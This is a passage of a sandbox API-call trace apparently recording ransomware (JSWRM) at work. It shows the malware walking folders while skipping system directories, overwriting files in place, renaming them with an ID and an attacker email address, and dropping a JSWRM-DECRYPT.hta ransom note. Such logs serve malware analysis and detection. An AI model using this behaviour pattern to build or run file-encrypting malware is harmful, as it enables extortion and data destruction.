RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.953] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0059.953] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0059.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.953] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0059.953] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0059.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0059.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c488 | out: hHeap=0x1e0000) returned 1 [0059.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0059.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0059.953] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12f70, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0059.953] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0059.953] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0059.953] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="...") returned 1 [0059.953] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="windows") returned -1 [0059.953] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="recovery") returned -1 [0059.953] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="perflogs") returned -1 [0059.953] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="documents and settings") returned 1 [0059.953] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$RECYCLE.BIN") returned 1 [0059.954] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="system volume information") returned -1 [0059.954] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="msocache") returned -1 [0059.954] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.954] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0059.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x240f70, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0059.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.954] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.954] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0059.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x240f20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0059.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.954] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0059.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0059.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.954] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0059.954] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0059.955] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=77680) returned 1 [0059.955] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x12f70) returned 0x2471a8 [0059.955] ReadFile (in: hFile=0x3d4, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x12f70, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f2d4*=0x12f70, lpOverlapped=0x0) returned 1 [0059.961] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.962] WriteFile (in: hFile=0x3d4, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x12f70, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f2d0*=0x12f70, lpOverlapped=0x0) returned 1 [0059.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0059.963] CloseHandle (hObject=0x3d4) returned 1 [0059.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0059.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0059.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d4c8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0059.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0059.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0059.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0059.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0059.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x23a120 [0059.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216f90 [0059.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a120 | out: hHeap=0x1e0000) returned 1 [0059.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0059.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216f90 | out: hHeap=0x1e0000) returned 1 [0059.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.965] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml"), lpNewFileName="C:\\588bce7c90097ed212\\1053\\LocalizedData.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1053\\localizeddata.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0059.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0059.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0059.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0059.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0059.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0059.966] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0059.966] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0059.966] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0059.966] lstrcmpiW (lpString1="SetupResources.dll", lpString2="...") returned 1 [0059.966] lstrcmpiW (lpString1="SetupResources.dll", lpString2="windows") returned -1 [0059.966] lstrcmpiW (lpString1="SetupResources.dll", lpString2="recovery") returned 1 [0059.966] lstrcmpiW (lpString1="SetupResources.dll", lpString2="perflogs") returned 1 [0059.966] lstrcmpiW (lpString1="SetupResources.dll", lpString2="documents and settings") returned 1 [0059.966] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$RECYCLE.BIN") returned 1 [0059.966] lstrcmpiW (lpString1="SetupResources.dll", lpString2="system volume information") returned -1 [0059.966] lstrcmpiW (lpString1="SetupResources.dll", lpString2="msocache") returned 1 [0059.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0059.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0059.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x241038, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0059.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0059.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0059.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x2413d0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0059.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232f58 [0059.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0059.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0059.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0059.966] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0059.966] FindClose (in: hFindFile=0x231b40 | out: hFindFile=0x231b40) returned 1 [0059.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232f58 | out: hHeap=0x1e0000) returned 1 [0059.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0059.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0059.967] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="1055", cAlternateFileName="")) returned 1 [0059.967] lstrcmpiW (lpString1="1055", lpString2=".") returned 1 [0059.967] lstrcmpiW (lpString1="1055", lpString2="..") returned 1 [0059.967] lstrcmpiW (lpString1="1055", lpString2="...") returned 1 [0059.967] lstrcmpiW (lpString1="1055", lpString2="windows") returned -1 [0059.967] lstrcmpiW (lpString1="1055", lpString2="recovery") returned -1 [0059.967] lstrcmpiW (lpString1="1055", lpString2="perflogs") returned -1 [0059.967] lstrcmpiW (lpString1="1055", lpString2="documents and settings") returned -1 [0059.967] lstrcmpiW (lpString1="1055", lpString2="$RECYCLE.BIN") returned 1 [0059.967] lstrcmpiW (lpString1="1055", lpString2="system volume information") returned -1 [0059.967] lstrcmpiW (lpString1="1055", lpString2="msocache") returned -1 [0059.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0059.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0059.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0059.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0059.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225f30 [0059.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0059.967] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1055\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1055\\jswrm-decrypt.hta")) returned 0xffffffff [0059.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225f30 | out: hHeap=0x1e0000) returned 1 [0059.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0059.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0059.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0059.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0059.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0059.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0059.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226530 [0059.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0059.968] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1055\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0059.970] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.970] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0059.971] CloseHandle (hObject=0x450) returned 1 [0059.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226530 | out: hHeap=0x1e0000) returned 1 [0059.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0059.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0059.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0059.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0059.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0059.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0059.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226530 [0059.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0059.972] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1055\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1055\\jswrm-decrypt.hta")) returned 0x20 [0059.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226530 | out: hHeap=0x1e0000) returned 1 [0059.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0059.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0059.972] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1055\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1a68f4f3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName=".", cAlternateFileName="")) returned 0x232040 [0059.972] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0059.972] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1a68f4f3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="..", cAlternateFileName="")) returned 1 [0059.972] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0059.972] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0059.972] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xf13, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0059.972] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0059.972] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0059.972] lstrcmpiW (lpString1="eula.rtf", lpString2="...") returned 1 [0059.972] lstrcmpiW (lpString1="eula.rtf", lpString2="windows") returned -1 [0059.972] lstrcmpiW (lpString1="eula.rtf", lpString2="recovery") returned -1 [0059.972] lstrcmpiW (lpString1="eula.rtf", lpString2="perflogs") returned -1 [0059.972] lstrcmpiW (lpString1="eula.rtf", lpString2="documents and settings") returned 1 [0059.972] lstrcmpiW (lpString1="eula.rtf", lpString2="$RECYCLE.BIN") returned 1 [0059.972] lstrcmpiW (lpString1="eula.rtf", lpString2="system volume information") returned -1 [0059.972] lstrcmpiW (lpString1="eula.rtf", lpString2="msocache") returned -1 [0059.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0059.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0059.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f610, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0059.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0059.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0059.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0059.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f5e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0059.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0059.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0059.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0059.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.973] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7f8 [0059.973] CreateFileW 